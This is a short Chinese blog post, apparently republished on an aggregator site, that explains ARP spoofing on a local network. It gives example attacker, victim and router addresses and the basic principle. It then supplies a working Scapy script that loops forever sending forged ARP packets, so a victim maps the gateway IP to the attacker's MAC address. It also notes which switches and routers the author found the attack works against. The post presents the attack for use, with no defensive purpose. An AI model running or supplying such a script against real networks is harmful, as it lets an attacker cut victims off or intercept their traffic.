ARP 攻击

Posted maskerk

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ARP 攻击相关的知识,希望对你有一定的参考价值。

场景

A攻击者 192.168.1.3 00:00:00:00:00:01
B受害者 192.168.1.2 00:00:00:00:00:02
C路由器 192.168.1.1 00:00:00:00:00:03

要求: ARP欺骗,满足要求A/B在共同路由器C下,即同一局域网。

实现与实现

原理

原理:
简单点说就一句话:A发送自己的mac给B说,我是192.168.1.1,我的mac地址是00:00:00:00:00:01
这样B在上网的时候就跑到A这里来了,A不提供路由功能的话B就上不了网了。

注意: 这里有一点注意就是A要持续给B发送ARP报文,停止发送后受害者B可以很快再寻找到真正的路由器mac地址

代码实现

from scapy.all import *

myarp = ARP()#构造ARP初始报文
myarp.hwsrc= 'e0:3f:49:a1:99:6c'
myarp.psrc = '172.17.168.1'
myarp.pdst = '172.17.174.73'
while True:
    send(myarp)

代码解释

172.17.174.73 的主机发送arp报文说,172.17.168.1 的mac地址是 e0:3f:49:a1:99:6c

注:
hwsrc 发送方Mac地址
psrc 发送方ip地址
hwdst 目标mac地址
pdst 目标ip地址

局限

经过测试,在同一个房间内连接同一个普通交换机的其他主机是可以被攻击掉的。但是两台pc如果同时连接到校园网的校级路由器,校级路由器比较高级,可能会过滤掉你的arp欺骗报文,导致失败

以上是关于ARP 攻击的主要内容,如果未能解决你的问题,请参考以下文章

如何检测ARP是不是被攻击

图解ARP协议ARP攻击原理与实践

图解ARP协议ARP攻击原理与实践

ARP渗透与攻防之ARP攻击防御

局域网ARP攻击检测方法都有哪些

服务器临时解决ARP欺骗攻击方法